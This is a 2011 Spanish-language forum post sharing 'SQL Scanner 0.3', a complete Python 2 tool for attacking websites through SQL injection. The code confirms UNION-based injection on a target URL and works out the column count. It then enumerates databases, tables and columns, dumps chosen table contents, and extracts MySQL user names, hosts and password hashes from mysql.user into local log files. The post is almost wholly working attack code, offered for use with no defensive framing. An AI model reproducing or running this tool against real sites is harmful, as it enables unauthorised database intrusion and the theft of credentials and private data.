[Python] SQL Scanner 0.3

BigBear · Julio 03, 2011, 09:36:57 PM

Bueno este es un simple scanner en python que hice para SQLI

Con las sig opciones :

Verifica vulnerabilidad
Busca columnas
Busca el numero milagroso y saca info sobre la DB
Saca tablas y columnas de de la DB actual o otra externa
Dumpear usuarios

Guarda todo en un log con el nombre de la web en la carpeta /logs

Código: python


#!usr/bin/python
#SQL Scanner 0.3 (C) Doddy Hackman 2010

import os,sys,urllib2,re,binascii
from urlparse import urlparse

def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")

def savefile(name,text):
 file = open(name,"a")
 file.write("\n"+text+"\n")
 file.close()

def gethost(test):
 return urlparse(test).netloc

def header() : 
 print "\n--== SQL Scanner ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 sys.exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()

def bypass(bypass): 
 if bypass == "--":
  return("+","--")
 elif bypass == "/*":
  return("/**/","/*")
 else: 
  return("+","--")


def dumper(web,passx,table,col1,col2):

 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
 code1 = toma(web1+pass1+"from"+pass1+table+pass2)
 print "\n\n[+] Searching values\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] Values Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)	
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
    c1 = c1[0]

    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
    c2 = c2[0]
    print "["+col1+"] : "+c1
    print "["+col2+"] : "+c2+"\n"
    savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
    savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
 else:
  print "[-] Not Found\n"



def mysqluser(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 print "\n\n[+] Searching mysql.user\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] mysql.user : ON"
  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  print "[+] Users Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    host = re.findall("K0BRA(.*?)K0BRA",code2)
    host = host[0]

    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
    user = user[0]
 
    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
    passw = passw[0]
    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
    print "[Host] : "+host
    print "[User] : "+user
    print "[Pass] : "+passw+"\n"    
 else:
  print "[-] Not Found\n" 
 


def showcolumnsdb(web,db,table,passx):
 db = "0x"+str(binascii.hexlify(db))
 table = "0x"+str(binascii.hexlify(table))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching columns in DB\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
  savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
    print "[Column Found] : "+column

 else:
  print "[-] Not Found\n"


def showtablesdb(web,db,passx):
 db = "0x"+str(binascii.hexlify(db))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching tables in DB\n\n"
 savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"



def showtables(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 print "\n\n[+] Searching tables\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(17,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"



def showcolumns(tabla,web,passx):
 pass1,pass2 = bypass(passx)
 tabla = "0x"+str(binascii.hexlify(tabla))
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
 print "\n\n[+] Searching tables\n\n"
 savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    print "[Column Found] : "+column
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
 else:
  print "[-] Not Found\n"




def showdbs(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
 print "\n\n[+] Searching DBS\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] DBS Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    db = re.findall("K0BRA(.*?)K0BRA",code2)
    db = db[0]
    print "[DB Found] : "+db
    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
 else:
  print "[-] Not Found\n"




def menu(page,bypass):
 clean()
 header()
 print "\n[+] Target : ",page,"\n"
 print "\n[information_schema]\n\n"
 print "1 - Show tables\n"
 print "2 - Show columns of the a table\n"
 print "3 - Show databases\n"
 print "4 - Show tables from the a DB\n"
 print "5 - Show columns from the a table of the DB\n"
 print "\n[mysql.user]\n\n"
 print "6 - Show users\n"
 print "\n[Others]\n\n"
 print "7 - Show details\n"
 print "8 - Dump data\n"
 print "9 - Show log\n"
 print "10 - Change target\n"
 print "11 - Exit\n\n"
 try:
  op = input("[Option] : ")
  if op == 1: 
   showtables(page,bypass)
   raw_input()    
   menu(page,bypass)
  elif op == 2:
   table = raw_input("\n\n[Table] : ")
   showcolumns(table,page,bypass)
   raw_input() 
   menu(page,bypass)
  elif op == 3:
   showdbs(page,bypass)
   raw_input() 
   menu(page,bypass)
  elif op == 4:
   db = raw_input("\n\n[DB] : ")
   showtablesdb(page,db,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 5:
   db = raw_input("\n\n[DB] : ")
   table = raw_input("\n\n[Table] : ")
   showcolumnsdb(page,db,table,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 6:
   mysqluser(page,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 7:
   more(page,bypass)
   raw_input()
   menu(page,bypass)	
  elif op == 8:
   table = raw_input("\n\n[Table] : ")
   col1 = raw_input("\n\n[Column 1] : ")
   col2 = raw_input("\n\n[Column 2] : ")
   dumper(page,bypass,table,col1,col2)
   raw_input()
   menu(page,bypass)
  elif op == 9:
   os.system("start logs/"+gethost(page)+".txt")
   menu(page,bypass)
  elif op == 10:
   sta()
 except:
  menu(page,bypass)
 if op == 11:
  copyright()
  
 
def more(web,passx):
 pass1,pass2 = bypass(passx)
 print "\n[+] Searching more data\n"
 web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
 code0 = toma(web1+pass2)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
  savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on" 
   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"
   savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")

def findlength(web,passx): 
 pass1,pass2 = bypass(passx) 
 print "\n[+] Finding columns length"
 number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
 for te in range(2,30):
  number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)	
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   sqla = re.sub(numbers[0],"hackman",sqli)
   savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
   menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

 print "[-] Length dont found\n"
   
    
def scan(web,passx):
 pass1,pass2 = bypass(passx) 
 print "\n\n[+] Testing vulnerability"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
 if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  copyright()


def sta(): 

 clean()
 header()

 web = raw_input("\n\n[Page] : ")
 bypasx = raw_input("\n\n[Bypass] : ")
 scan(web,bypasx)

sta()

#The End

[Python] SQL Scanner 0.3

BigBear

Julio 03, 2011, 09:36:57 PM Ultima modificación: Julio 07, 2011, 07:03:09 PM por Sthefano02